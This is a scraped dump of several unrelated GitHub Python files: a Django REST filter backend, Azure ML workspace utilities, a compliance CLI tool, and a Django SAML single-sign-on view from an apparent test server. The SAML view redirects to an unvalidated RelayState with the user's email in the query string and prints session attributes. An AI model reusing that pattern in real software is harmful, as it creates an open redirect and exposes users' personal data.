idx_weights\n","repo_name":"AspirinCode/MultiOmicsGraphEmbedding","sub_path":"moge/generator/nx/multiplex.py","file_name":"multiplex.py","file_ext":"py","file_size_in_byte":10075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72310819040","text":"\"\"\"This module contains custom filter backends.\"\"\"\n\nfrom django.core.exceptions import ValidationError as InternalValidationError\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.db.models import Q, Prefetch\nfrom django.utils import six\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.filters import BaseFilterBackend, OrderingFilter\n\nfrom dynamic_rest.conf import settings\nfrom dynamic_rest.datastructures import TreeMap\nfrom dynamic_rest.fields import DynamicRelationField\nfrom dynamic_rest.meta import get_model_field, is_field_remote, is_model_field\nfrom dynamic_rest.patches import patch_prefetch_one_level\nfrom dynamic_rest.related import RelatedObject\n\npatch_prefetch_one_level()\n\n\ndef has_joins(queryset):\n \"\"\"Return True iff. a queryset includes joins.\n\n If this is the case, it is possible for the queryset\n to return duplicate results.\n \"\"\"\n for join in six.itervalues(queryset.query.alias_map):\n if join.join_type:\n return True\n return False\n\n\nclass FilterNode(object):\n\n def __init__(self, field, operator, value):\n \"\"\"Create an object representing a filter, to be stored in a TreeMap.\n\n For example, a filter query like `filter{users.events.capacity.lte}=1`\n would be passed into a `FilterNode` as follows:\n\n ```\n field = ['users', 'events', 'capacity']\n operator = 'lte'\n value = 1\n node = FilterNode(field, operator, value)\n ```\n\n Arguments:\n field: A list of field parts.\n operator: A valid filter operator, or None.\n Per Django convention, `None` means the equality operator.\n value: The value to filter on.\n \"\"\"\n self.field = field\n self.operator = operator\n self.value = value\n\n @property\n def key(self):\n return '%s%s' % (\n '__'.join(self.field),\n '__' + self.operator if self.operator else ''\n )\n\n def generate_query_key(self, serializer):\n \"\"\"Get the key that can be passed to Django's filter method.\n\n To account for serialier field name rewrites, this method\n translates serializer field names to model field names\n by inspecting `serializer`.\n\n For example, a query like `filter{users.events}` would be\n returned as `users__events`.\n\n Arguments:\n serializer: A DRF serializer\n\n Returns:\n A filter key.\n \"\"\"\n rewritten = []\n last = len(self.field) - 1\n s = serializer\n for i, field_name in enumerate(self.field):\n # Note: .fields can be empty for related serializers that aren't\n # sideloaded. Fields that are deferred also won't be present.\n # If field name isn't in serializer.fields, get full list from\n # get_all_fields() method. This is somewhat expensive, so only do\n # this if we have to.\n fields = s.fields\n if field_name not in fields:\n fields = getattr(s, 'get_all_fields', lambda: {})()\n\n if field_name == 'pk':\n rewritten.append('pk')\n continue\n\n if field_name not in fields:\n raise ValidationError(\n \"Invalid filter field: %s\" % field_name\n )\n\n field = fields[field_name]\n\n # For remote fields, strip off '_set' for filtering. This is a\n # weird Django inconsistency.\n model_field_name = field.source or field_name\n model_field = get_model_field(s.get_model(), model_field_name)\n if isinstance(model_field, RelatedObject):\n model_field_name = model_field.field.related_query_name()\n\n # If get_all_fields() was used above, field could be unbound,\n # and field.source would be None\n rewritten.append(model_field_name)\n\n if i == last:\n break\n\n # Recurse into nested field\n s = getattr(field, 'serializer', None)\n if isinstance(s, serializers.ListSerializer):\n s = s.child\n if not s:\n raise ValidationError(\n \"Invalid nested filter field: %s\" % field_name\n )\n\n if self.operator:\n rewritten.append(self.operator)\n\n return '__'.join(rewritten)\n\n\nclass DynamicFilterBackend(BaseFilterBackend):\n \"\"\"A DRF filter backend that construct DREST querysets.\n\n This backend is responsible for interpretting and applying\n filters, includes, and excludes to the base queryset of a view.\n\n Attributes:\n VALID_FILTER_OPERATORS: A list of filter operators.\n FALSEY_STRINGS: A list of strings that are interpretted as\n False by the isnull operator.\n \"\"\"\n\n VALID_FILTER_OPERATORS = (\n 'in',\n 'any',\n 'all',\n 'icontains',\n 'contains',\n 'startswith',\n 'istartswith',\n 'endswith',\n 'iendswith',\n 'year',\n 'month',\n 'day',\n 'week_day',\n 'regex',\n 'range',\n 'gt',\n 'lt',\n 'gte',\n 'lte',\n 'isnull',\n 'eq',\n None,\n )\n\n FALSEY_STRINGS = (\n '0',\n 'false',\n '',\n )\n\n def filter_queryset(self, request, queryset, view):\n \"\"\"Filter the queryset.\n\n This is the main entry-point to this class, and\n is called by DRF's list handler.\n \"\"\"\n self.request = request\n self.view = view\n\n self.DEBUG = settings.DEBUG\n\n if self.DEBUG:\n # in DEBUG mode, save a representation of the prefetch tree\n # on the viewset\n self.view._prefetches = self._prefetches = {}\n\n return self._filter_queryset(queryset=queryset)\n\n def _extract_filters(self, **kwargs):\n \"\"\"\n Convert 'filters' query params into a dict that can be passed\n to Q. Returns a dict with two fields, 'include' and 'exclude',\n which can be used like:\n\n result = self._extract_filters()\n q = Q(**result['include'] & ~Q(**result['exclude'])\n\n \"\"\"\n\n filters_map = (\n kwargs.get('filters_map') or\n self.view.get_request_feature(self.view.FILTER)\n )\n\n out = TreeMap()\n\n for spec, value in six.iteritems(filters_map):\n\n # Inclusion or exclusion?\n if spec[0] == '-':\n spec = spec[1:]\n inex = '_exclude'\n else:\n inex = '_include'\n\n # for relational filters, separate out relation path part\n if '|' in spec:\n rel, spec = spec.split('|')\n rel = rel.split('.')\n else:\n rel = None\n\n parts = spec.split('.')\n\n # Last part could be operator, e.g. \"events.capacity.gte\"\n if len(parts) > 1 and parts[-1] in self.VALID_FILTER_OPERATORS:\n operator = parts.pop()\n else:\n operator = None\n\n # All operators except 'range' and 'in' should have one value\n if operator == 'range':\n value = value[:2]\n elif operator == 'in':\n # no-op: i.e. accept `value` as an arbitrarily long list\n pass\n elif operator in self.VALID_FILTER_OPERATORS:\n value = value[0]\n if (\n operator == 'isnull' and\n isinstance(value, six.string_types)\n ):\n value = value.lower() not in self.FALSEY_STRINGS\n elif operator == 'eq':\n operator = None\n\n node = FilterNode(parts, operator, value)\n\n # insert into output tree\n path = rel if rel else []\n path += [inex, node.key]\n out.insert(path, node)\n\n return out\n\n def _filters_to_query(self, includes, excludes, serializer, q=None):\n \"\"\"\n Construct Django Query object from request.\n Arguments are dictionaries, which will be passed to Q() as kwargs.\n\n e.g.\n includes = { 'foo' : 'bar', 'baz__in' : [1, 2] }\n produces:\n Q(foo='bar', baz__in=[1, 2])\n\n Arguments:\n includes: TreeMap representing inclusion filters.\n excludes: TreeMap representing exclusion filters.\n serializer: serializer instance of top-level object\n q: Q() object (optional)\n\n Returns:\n Q() instance or None if no inclusion or exclusion filters\n were specified.\n \"\"\"\n\n def rewrite_filters(filters, serializer):\n out = {}\n for k, node in six.iteritems(filters):\n filter_key = node.generate_query_key(serializer)\n out[filter_key] = node.value\n\n return out\n\n q = q or Q()\n\n if not includes and not excludes:\n return None\n\n if includes:\n includes = rewrite_filters(includes, serializer)\n q &= Q(**includes)\n if excludes:\n excludes = rewrite_filters(excludes, serializer)\n for k, v in six.iteritems(excludes):\n q &= ~Q(**{k: v})\n return q\n\n def _build_prefetch_queryset(\n self,\n name,\n original_field,\n field,\n filters,\n requirements\n ):\n \"\"\"Applies prefetches to a queryset.\"\"\"\n related_queryset = getattr(original_field, 'queryset', None)\n\n if callable(related_queryset):\n related_queryset = related_queryset(field)\n\n source = field.source or name\n # Popping the source here (during explicit prefetch construction)\n # guarantees that implicitly required prefetches that follow will\n # not conflict.\n required = requirements.pop(source, None)\n\n if self.DEBUG:\n # push prefetches\n prefetches = self._prefetches\n self._prefetches[source] = {}\n self._prefetches = self._prefetches[source]\n\n queryset = self._filter_queryset(\n serializer=field,\n filters=filters.get(name, {}),\n queryset=related_queryset,\n requirements=required\n )\n\n if self.DEBUG:\n # pop back\n self._prefetches = prefetches\n\n return queryset\n\n def _add_internal_prefetches(\n self,\n prefetches,\n requirements\n ):\n \"\"\"Add internal (required) prefetches to a prefetch dictionary.\"\"\"\n paths = requirements.get_paths()\n for path in paths:\n # Remove last segment, which indicates a field name or wildcard.\n # For example, {model_a : {model_b : {field_c}}\n # should be prefetched as a__b\n prefetch_path = path[:-1]\n key = '__'.join(prefetch_path)\n if key:\n prefetches[key] = key\n if self.DEBUG:\n self._prefetches[key] = {}\n\n def _add_request_prefetches(\n self,\n prefetches,\n requirements,\n model,\n fields,\n filters\n ):\n \"\"\"Add external (requested) prefetches to a prefetch dictionary.\"\"\"\n for name, field in six.iteritems(fields):\n original_field = field\n if isinstance(field, DynamicRelationField):\n field = field.serializer\n if isinstance(field, serializers.ListSerializer):\n field = field.child\n if not isinstance(field, serializers.ModelSerializer):\n continue\n\n source = field.source or name\n if '.' in source:\n raise ValidationError(\n 'nested relationship values '\n 'are not supported'\n )\n\n if source in prefetches:\n # ignore duplicated sources\n continue\n\n is_remote = is_field_remote(model, source)\n is_id_only = getattr(field, 'id_only', lambda: False)()\n if is_id_only and not is_remote:\n continue\n\n prefetch_queryset = self._build_prefetch_queryset(\n name,\n original_field,\n field,\n filters,\n requirements\n )\n\n # Note: There can only be one prefetch per source, even\n # though there can be multiple fields pointing to\n # the same source. This could break in some cases,\n # but is mostly an issue on writes when we use all\n # fields by default.\n prefetches[source] = Prefetch(\n source,\n queryset=prefetch_queryset\n )\n\n def _extract_requirements(\n self,\n fields,\n requirements\n ):\n \"\"\"Extract internal prefetch requirements from serializer fields.\"\"\"\n for name, field in six.iteritems(fields):\n source = field.source\n # Requires may be manually set on the field -- if not,\n # assume the field requires only its source.\n requires = getattr(field, 'requires', None) or [source]\n for require in requires:\n if not require:\n # ignore fields with empty source\n continue\n\n requirement = require.split('.')\n if requirement[-1] == '':\n # Change 'a.b.' -> 'a.b.*',\n # supporting 'a.b.' for backwards compatibility.\n requirement[-1] = '*'\n requirements.insert(requirement, TreeMap(), update=True)\n\n def _filter_queryset(\n self,\n serializer=None,\n filters=None,\n queryset=None,\n requirements=None\n ):\n \"\"\"Recursive queryset builder.\n\n Handles nested prefetching of related data and deferring fields\n at the queryset level.\n\n Arguments:\n serializer: An optional serializer to use a base for the queryset.\n If no serializer is passed, the `get_serializer` method will\n be used to initialize the base serializer for the viewset.\n filters: An optional TreeMap of nested filters.\n queryset: An optional base queryset.\n requirements: An optional TreeMap of nested requirements.\n \"\"\"\n\n is_root_level = False\n if serializer:\n if queryset is None:\n queryset = serializer.Meta.model.objects\n else:\n serializer = self.view.get_serializer()\n is_root_level = True\n\n model = getattr(serializer.Meta, 'model', None)\n\n if not model:\n return queryset\n\n prefetches = {}\n fields = serializer.fields\n\n if requirements is None:\n requirements = TreeMap()\n\n self._extract_requirements(\n fields,\n requirements\n )\n\n if filters is None:\n filters = self._extract_filters()\n\n # build nested Prefetch queryset\n self._add_request_prefetches(\n prefetches,\n requirements,\n model,\n fields,\n filters\n )\n\n # add any remaining requirements as prefetches\n self._add_internal_prefetches(\n prefetches,\n requirements\n )\n\n # use requirements at this level to limit fields selected\n # only do this for GET requests where we are not requesting the\n # entire fieldset\n if '*' not in requirements and not self.view.is_update():\n id_fields = getattr(serializer, 'get_id_fields', lambda: [])()\n # only include local model fields\n only = [\n field for field in set(id_fields + list(requirements.keys()))\n if is_model_field(model, field)\n and not is_field_remote(model, field)\n ]\n queryset = queryset.only(*only)\n\n # add filters\n query = self._filters_to_query(\n includes=filters.get('_include'),\n excludes=filters.get('_exclude'),\n serializer=serializer\n )\n\n if query:\n # Convert internal django ValidationError to APIException-based one\n # in order to resolve validation errors from 500 status code to\n # 400.\n try:\n queryset = queryset.filter(query)\n except InternalValidationError as e:\n raise ValidationError(\n dict(e) if hasattr(e, 'error_dict') else list(e)\n )\n\n # A serializer can have this optional function\n # to dynamically apply additional filters on\n # any queries that will use that serializer\n # You could use this to have (for example) different\n # serializers for different subsets of a model or to\n # implement permissions which work even in sideloads\n if hasattr(serializer, 'filter_queryset'):\n queryset = serializer.filter_queryset(queryset)\n\n prefetch = prefetches.values()\n queryset = queryset.prefetch_related(*prefetch)\n if has_joins(queryset) or not is_root_level:\n queryset = queryset.distinct()\n\n return queryset\n\n\nclass DynamicSortingFilter(OrderingFilter):\n \"\"\"Subclass of DRF's OrderingFilter.\n\n This class adds support for multi-field ordering and rewritten fields.\n \"\"\"\n\n def filter_queryset(self, request, queryset, view):\n \"\"\"\"Filter the queryset, applying the ordering.\n\n The `ordering_param` can be overwritten here.\n In DRF, the ordering_param is 'ordering', but we support changing it\n to allow the viewset to control the parameter.\n \"\"\"\n self.ordering_param = view.SORT\n\n ordering = self.get_ordering(request, queryset, view)\n if ordering:\n return queryset.order_by(*ordering)\n\n return queryset\n\n def get_ordering(self, request, queryset, view):\n \"\"\"Return an ordering for a given request.\n\n DRF expects a comma separated list, while DREST expects an array.\n This method overwrites the DRF default so it can parse the array.\n \"\"\"\n params = view.get_request_feature(view.SORT)\n if params:\n fields = [param.strip() for param in params]\n valid_ordering, invalid_ordering = self.remove_invalid_fields(\n queryset, fields, view\n )\n\n # if any of the sort fields are invalid, throw an error.\n # else return the ordering\n if invalid_ordering:\n raise ValidationError(\n \"Invalid filter field: %s\" % invalid_ordering\n )\n else:\n return valid_ordering\n\n # No sorting was included\n return self.get_default_ordering(view)\n\n def remove_invalid_fields(self, queryset, fields, view):\n \"\"\"Remove invalid fields from an ordering.\n\n Overwrites the DRF default remove_invalid_fields method to return\n both the valid orderings and any invalid orderings.\n \"\"\"\n # get valid field names for sorting\n valid_fields_map = {\n name: source for name, label, source in self.get_valid_fields(\n queryset, view)\n }\n\n valid_orderings = []\n invalid_orderings = []\n\n # for each field sent down from the query param,\n # determine if its valid or invalid\n for term in fields:\n stripped_term = term.lstrip('-')\n # add back the '-' add the end if necessary\n reverse_sort_term = '' if len(stripped_term) is len(term) else '-'\n if stripped_term in valid_fields_map:\n name = reverse_sort_term + valid_fields_map[stripped_term]\n valid_orderings.append(name)\n else:\n invalid_orderings.append(term)\n\n return valid_orderings, invalid_orderings\n\n def get_valid_fields(self, queryset, view):\n \"\"\"Return valid fields for ordering.\n\n Overwrites DRF's get_valid_fields method so that valid_fields returns\n serializer fields, not model fields.\n \"\"\"\n valid_fields = getattr(view, 'ordering_fields', self.ordering_fields)\n\n if valid_fields is None or valid_fields == '__all__':\n # Default to allowing filtering on serializer fields\n serializer_class = getattr(view, 'serializer_class')\n if serializer_class is None:\n msg = (\n \"Cannot use %s on a view which does not have either a \"\n \"'serializer_class' or 'ordering_fields' attribute.\"\n )\n raise ImproperlyConfigured(msg % self.__class__.__name__)\n valid_fields = [\n (field_name, field.label, field.source or field_name)\n for field_name, field in serializer_class().fields.items()\n if not getattr(\n field, 'write_only', False\n ) and not field.source == '*'\n ]\n else:\n serializer_class = getattr(view, 'serializer_class')\n valid_fields = [\n (field_name, field.label, field.source or field_name)\n for field_name, field in serializer_class().fields.items()\n if not getattr(field, 'write_only', False)\n and not field.source == '*' and field_name in valid_fields\n ]\n return valid_fields\n","repo_name":"trb116/pythonanalyzer","sub_path":"data/input/AltSchool/dynamic-rest/dynamic_rest/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":21769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3577370462","text":"import logging\nimport random\nimport uuid\n\nfrom azure.ai.ml._azure_environments import _get_base_url_from_metadata\nfrom azure.ai.ml._vendor.azure_resources._resource_management_client import ResourceManagementClient\nfrom azure.ai.ml._vendor.azure_resources.models import GenericResource\nfrom azure.ai.ml.constants._common import ArmConstants\nfrom azure.core.credentials import TokenCredential\n\nmodule_logger = logging.getLogger(__name__)\n\n\ndef get_name_for_dependent_resource(workspace_name: str, resource_type: str) -> str:\n alphabets_str = \"\"\n for char in workspace_name.lower():\n if char.isalpha() or char.isdigit():\n alphabets_str = alphabets_str + char\n rand_str = str(uuid.uuid4()).replace(\"-\", \"\")\n resource_name = alphabets_str[:8] + resource_type[:8] + rand_str\n return resource_name[:24]\n\n\ndef get_deployment_name(name: str):\n random.seed(version=2)\n return f\"{name}-{random.randint(1, 10000000)}\"\n\n\ndef get_resource_group_location(credentials: TokenCredential, subscription_id: str, resource_group_name: str) -> str:\n client = ResourceManagementClient(\n credential=credentials,\n subscription_id=subscription_id,\n base_url=_get_base_url_from_metadata(),\n api_version=ArmConstants.AZURE_MGMT_RESOURCE_API_VERSION,\n )\n rg = client.resource_groups.get(resource_group_name)\n return rg.location\n\n\ndef get_generic_arm_resource_by_arm_id(\n credentials: TokenCredential,\n subscription_id: str,\n arm_id: str,\n api_version: str,\n) -> GenericResource:\n if arm_id:\n client = ResourceManagementClient(\n credential=credentials,\n subscription_id=subscription_id,\n base_url=_get_base_url_from_metadata(),\n api_version=ArmConstants.AZURE_MGMT_RESOURCE_API_VERSION,\n )\n return client.resources.get_by_id(arm_id, api_version)\n return None\n\n\ndef delete_resource_by_arm_id(\n credentials: TokenCredential,\n subscription_id: str,\n arm_id: str,\n api_version: str,\n) -> None:\n if arm_id:\n client = ResourceManagementClient(\n credential=credentials,\n subscription_id=subscription_id,\n base_url=_get_base_url_from_metadata(),\n api_version=ArmConstants.AZURE_MGMT_RESOURCE_API_VERSION,\n )\n client.resources.begin_delete_by_id(arm_id, api_version)\n\n\ndef get_resource_and_group_name(armstr: str) -> str:\n return armstr.split(\"/\")[-1], armstr.split(\"/\")[-5]\n\n\ndef get_endpoint_parts(arm_id: str, subnet_arm_id: str) -> ():\n arm_id_parts = arm_id.split(\"/\")\n subnet_id_parts = subnet_arm_id.split(\"/\")\n conn_name = arm_id_parts[-1]\n subscription_id = arm_id_parts[2]\n resource_group = arm_id_parts[4]\n vnet_name = subnet_id_parts[-3]\n subnet_name = subnet_id_parts[-1]\n return conn_name, subscription_id, resource_group, vnet_name, subnet_name\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/ml/azure-ai-ml/azure/ai/ml/_utils/_workspace_utils.py","file_name":"_workspace_utils.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"12218487050","text":"\"\"\"\nThe qw (Quality Workflow) tool.\n\nHelps enforce regulatory compliance for projects managed on GitHub.\n\"\"\"\n\nimport sys\nfrom enum import Enum\nfrom typing import Annotated, Optional\n\nimport git\nimport typer\nfrom loguru import logger\nfrom rich.prompt import Prompt\n\nfrom qw.base import QwError\nfrom qw.changes import ChangeHandler\nfrom qw.local_store.keyring import get_qw_password, set_qw_password\nfrom qw.local_store.main import LocalStore\nfrom qw.mergedoc import load_template\nfrom qw.remote_repo.factory import get_service\nfrom qw.remote_repo.service import (\n Service,\n get_repo_url,\n hostname_to_service,\n remote_address_to_host_user_repo,\n)\n\napp = typer.Typer()\n\n\nclass LogLevel(str, Enum):\n \"\"\"Log Level.\"\"\"\n\n ERROR = \"error\"\n WARNING = \"warning\"\n INFO = \"info\"\n DEBUG = \"debug\"\n\n\nLOGLEVEL_TO_LOGURU = {\n LogLevel.DEBUG: 10,\n LogLevel.INFO: 20,\n LogLevel.WARNING: 30,\n LogLevel.ERROR: 40,\n}\n\nstore = LocalStore()\n\n\ndef _build_and_check_service():\n conf = store.read_configuration()\n service = get_service(conf)\n service.check()\n typer.echo(\"Can connect to the remote repository 🎉\")\n return service\n\n\n@app.callback()\ndef main(\n loglevel: Annotated[\n Optional[LogLevel],\n typer.Option(\n help=\"Level of logging to output\",\n ),\n ] = LogLevel.INFO,\n):\n \"\"\"\n Process global options.\n\n Processes the options passed before the command.\n \"\"\"\n logger.remove()\n if loglevel is not None:\n logger.add(sys.stderr, level=LOGLEVEL_TO_LOGURU[loglevel])\n\n\n@app.command()\ndef init(\n repo: Annotated[\n Optional[str],\n typer.Option(\n help=\"The URL (or remote name) for the repo containing\"\n \" the issues. If not supplied the remotes named\"\n \" 'upstream' and 'origin' will be tried.\",\n ),\n ] = None,\n service: Annotated[\n Optional[Service],\n typer.Option(\n help=\"Which service is hosting the issue tracker. Not\"\n \" required if the repo URL begins 'github' or 'gitlab'.\",\n ),\n ] = None,\n force: Annotated[\n Optional[bool],\n typer.Option(\n help=\"Replace any existing configuration.\",\n ),\n ] = False,\n) -> None:\n \"\"\"Initialize this tool and the repository (as far as possible).\"\"\"\n gitrepo = git.Repo(store.base_dir)\n repo = get_repo_url(gitrepo, repo)\n store.get_or_create_qw_dir(force=force)\n (host, username, reponame) = remote_address_to_host_user_repo(repo)\n if service is None:\n service = hostname_to_service(host)\n store.initialise_qw_files(repo, reponame, service, username)\n\n\n@app.command()\ndef check(\n issue: Annotated[\n Optional[int],\n typer.Option(\n help=\"Issue number to check\",\n ),\n ] = None,\n review_request: Annotated[\n Optional[int],\n typer.Option(\n help=\"Review request number to check\",\n ),\n ] = None,\n token: Annotated[\n Optional[str],\n typer.Option(\n help=\"CI access token to use for checking, otherwise will use local config\",\n ),\n ] = None,\n repository: Annotated[\n Optional[str],\n typer.Option(\n help=\"Repository in form '${organisation}/${repository}'\",\n ),\n ] = None,\n) -> None:\n \"\"\"Check issue or pull request for any QW problems.\"\"\"\n if token and repository:\n logger.info(\"Using CI access token for authorisation\")\n else:\n logger.info(\n \"Using local qw config for authorisation because '--token' and '--repository' were not used\",\n )\n _build_and_check_service()\n # currently dummy function as doesn't need real functionality for configuration\n if issue and review_request:\n QwError(\n \"Check should only be run on an issue or a review_request, not both at the same time\",\n )\n if not (issue or review_request):\n QwError(\"Nothing given to check, please add a issue or review_request to check\")\n logger.success(\n \"Checks complete, stdout will contain a checklist of any problems found\",\n )\n\n\n@app.command()\ndef login(\n *,\n force: Annotated[\n Optional[bool],\n typer.Option(\n help=\"Replace existing access credentials.\",\n ),\n ] = False,\n):\n \"\"\"Add access credentials for the remote repository.\"\"\"\n conf = store.read_configuration()\n existing_access_token = get_qw_password(conf[\"user_name\"], conf[\"repo_name\"])\n\n if existing_access_token and not force:\n typer.echo(\n \"Access token already exists, rerun with '--force' if you want to override it.\",\n )\n else:\n access_token = Prompt.ask(\n f\"Please copy the access token for {conf['service']}\",\n )\n\n set_qw_password(conf[\"user_name\"], conf[\"repo_name\"], access_token)\n\n _build_and_check_service()\n\n\n@app.command()\ndef freeze():\n \"\"\"Freeze the state of remote design stages and update local store.\"\"\"\n conf = store.read_configuration()\n service = get_service(conf)\n change_handler = ChangeHandler(service, store)\n to_save = change_handler.combine_local_and_remote_items()\n store.write_local_data([x.to_dict() for x in to_save])\n logger.info(\"Finished freeze\")\n\n\n@app.command()\ndef configure(\n force: Annotated[\n Optional[bool],\n typer.Option(\n help=\"Replace existing configuration.\",\n ),\n ] = False,\n):\n \"\"\"Configure remote repository for qw (after initialisation and login credentials added).\"\"\"\n service = _build_and_check_service()\n store.write_templates_and_ci(service, force=force)\n typer.echo(\n \"Local repository updated, please commit the changes made to your local repository.\",\n )\n service.update_remote(force=force)\n typer.echo(\n \"Updated remote repository with rules\",\n )\n\n\n@app.command()\ndef release():\n \"\"\"Produce documentation by merging frozen values into templates.\"\"\"\n doc = load_template(\"tests/resources/msword/test_template.docx\")\n doc.write(\n output_file=\"out.docx\",\n data={\n \"soup\": [\n {\n \"id\": \"34\",\n \"name\": \"Python\",\n \"description\": \"The **Python** programming language\",\n },\n {\n \"id\": \"75\",\n \"name\": \"python-docx\",\n \"description\": (\n \"The *Python* module `python-docx`.\\n\"\n \"* provides access to MS Word Documents\\n\"\n \"* Isn't very good\"\n ),\n },\n ],\n \"software-requirement\": [\n {\n \"id\": \"101\",\n \"name\": \"Dose input\",\n \"description\": \"Allow the user to input the *dose*.\",\n \"system-requirement\": \"31\",\n },\n {\n \"id\": \"102\",\n \"name\": \"Dose measurement\",\n \"description\": (\"The *hardware* must measure the dose given.\"),\n \"system-requirement\": \"32\",\n },\n {\n \"id\": \"103\",\n \"name\": \"Dose articulation\",\n \"description\": (\n \"The *hardware* must stop delivering the\"\n \" medicine when dose given meets the dose\"\n \" required.\"\n ),\n \"system-requirement\": \"32\",\n },\n {\n \"id\": \"104\",\n \"name\": \"Lock screen\",\n \"description\": (\n \"The [screen](https://dictionary.cambridge.org\"\n \"/dictionary/english/screen) should show\"\n \" `locked` when the _lock_ button is pressed\"\n ),\n \"system-requirement\": \"33\",\n },\n ],\n \"system-requirement\": [\n {\n \"id\": \"31\",\n \"name\": \"Dose input\",\n \"description\": \"User must be able to input the dose\",\n },\n {\n \"id\": \"32\",\n \"name\": \"Dose correct\",\n \"description\": \"Dose must match the input dose\",\n },\n {\n \"id\": \"33\",\n \"name\": \"Lockable\",\n \"description\": (\n \"Device should be easily lockable and only\"\n \" unlockable by the registered user.\"\n ),\n },\n {\n \"id\": \"34\",\n \"name\": \"Something else\",\n \"description\": \"Are we having **fun** yet?\",\n },\n ],\n },\n )\n\n\nif __name__ == \"__main__\":\n try:\n app()\n sys.exit(0)\n except QwError as e:\n sys.stderr.write(str(e) + \"\\n\")\n sys.exit(2)\n","repo_name":"UCL-ARC/qw","sub_path":"src/qw/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":9129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"24662599207","text":"import os\n\nfrom rest_framework import viewsets, mixins\nfrom rest_framework.permissions import AllowAny\nfrom .models import User\nfrom .permissions import IsUserOrReadOnly\nfrom .serializers import CreateUserSerializer, UserSerializer\n\nfrom rest_framework.response import Response\nfrom django.http import HttpResponseRedirect\n\nfrom rest_framework.decorators import action\n\nfrom django.conf import settings\nfrom rest_framework.settings import api_settings\n\nfrom onelogin.saml2.auth import OneLogin_Saml2_Auth\nfrom onelogin.saml2.settings import OneLogin_Saml2_Settings\nfrom onelogin.saml2.utils import OneLogin_Saml2_Utils\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nclass UserViewSet(mixins.RetrieveModelMixin,\n mixins.UpdateModelMixin,\n viewsets.GenericViewSet):\n \"\"\"\n Updates and retrieves user accounts\n \"\"\"\n queryset = User.objects.all()\n serializer_class = UserSerializer\n permission_classes = (IsUserOrReadOnly,)\n\n\nclass UserCreateViewSet(mixins.CreateModelMixin,\n viewsets.GenericViewSet):\n \"\"\"\n Creates user accounts\n \"\"\"\n queryset = User.objects.all()\n serializer_class = CreateUserSerializer\n permission_classes = (AllowAny,)\n\n\nclass IndexViewset(viewsets.ViewSet):\n \n permission_classes = [AllowAny]\n\n def list(self, request):\n return Response({ 'message': 'index 1' })\n\n\nclass AttrsViewset(viewsets.ViewSet):\n \n permission_classes = [AllowAny]\n\n def list(self, request):\n # print('settings', settings.__dict__)\n print('settings', BASE_DIR, os.path.join(BASE_DIR, 'settings.json'))\n return Response({ 'message': 'attrs 1' })\n\n\ndef init_saml_auth(req):\n auth = OneLogin_Saml2_Auth(req, custom_base_path=settings.SAML_FOLDER)\n return auth\n\n\ndef prepare_django_request(request):\n # If server is behind proxys or balancers use the HTTP_X_FORWARDED fields\n result = {\n 'https': 'on' if request.is_secure() else 'off',\n 'http_host': request.META['HTTP_HOST'],\n 'script_name': request.META['PATH_INFO'],\n 'server_port': request.META['SERVER_PORT'],\n 'get_data': request.GET.copy(),\n # Uncomment if using ADFS as IdP, https://github.com/onelogin/python-saml/pull/144\n # 'lowercase_urlencoding': True,\n 'post_data': request.POST.copy()\n }\n return result\n\n\nclass ACSViewset(viewsets.ViewSet):\n \n permission_classes = [AllowAny]\n\n @action(url_path='', methods=['post'], detail=False)\n def acs(self, request):\n req = prepare_django_request(request)\n print('\\n', '-'*25)\n print('req', req)\n print('\\n\\n')\n\n # settings_path = os.path.join(BASE_DIR, 'settings.json')\n auth = OneLogin_Saml2_Auth(req, custom_base_path=BASE_DIR)\n print('\\n', '-'*25)\n print('auth', auth)\n print('\\n\\n')\n\n auth.process_response()\n errors = auth.get_errors()\n print('\\n', '-'*25)\n print('errors', errors)\n print('\\n\\n')\n\n\n if not errors:\n print('\\n', '-'*25)\n print('auth.is_authenticated()', auth.is_authenticated())\n print('\\n\\n')\n\n if auth.is_authenticated():\n print('\\n', '-'*25)\n print('auth.get_attributes()', auth.get_attributes())\n print('\\n\\n')\n\n print('\\n', '-'*25)\n print('auth.get_settings()', auth.get_settings())\n print('\\n\\n')\n\n print('\\n', '-'*25)\n print('auth.get_nameid()', auth.get_nameid())\n print('\\n\\n')\n\n name_id=auth.get_nameid()\n \n request.session['samlUserdata'] = auth.get_attributes()\n \n print('\\n', '-'*25)\n print('req[post_data]', req['post_data'])\n print('\\n\\n')\n\n print('\\n', '-'*25)\n print('OneLogin_Saml2_Utils.get_self_url(req)', OneLogin_Saml2_Utils.get_self_url(req))\n print('\\n\\n')\n\n print('\\n', '-'*25)\n print('\\'RelayState\\' in req[\\'post_data\\'] and OneLogin_Saml2_Utils.get_self_url(req) != req[\\'post_data\\'][\\'RelayState\\']', 'RelayState' in req['post_data'] and OneLogin_Saml2_Utils.get_self_url(req) != req['post_data']['RelayState'])\n print('\\n\\n') \n\n if 'RelayState' in req['post_data'] and OneLogin_Saml2_Utils.get_self_url(req) != req['post_data']['RelayState']:\n print('auth.redirect_to(req[\\'post_data\\'][\\'RelayState\\'])', req['post_data']['RelayState'])\n # auth.redirect_to(req['post_data']['RelayState'])\n url = req['post_data']['RelayState']\n url = '{url}?isAuthenticated=true&email={email}'.format(**{\n 'url': url,\n 'email': name_id\n })\n return HttpResponseRedirect(redirect_to=url)\n else:\n for attr_name in request.session['samlUserdata'].keys():\n print('%s ==> %s' % (attr_name, '|| '.join(request.session['samlUserdata'][attr_name])))\n else:\n print('Not authenticated')\n else:\n print(\"Error when processing SAML Response: %s\" % (', '.join(errors)))\n\n return Response({ 'message': 'ACS' })","repo_name":"akshays94/sso-test-server","sub_path":"piedpiper/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"10248113161","text":"import json\r\nfrom player import 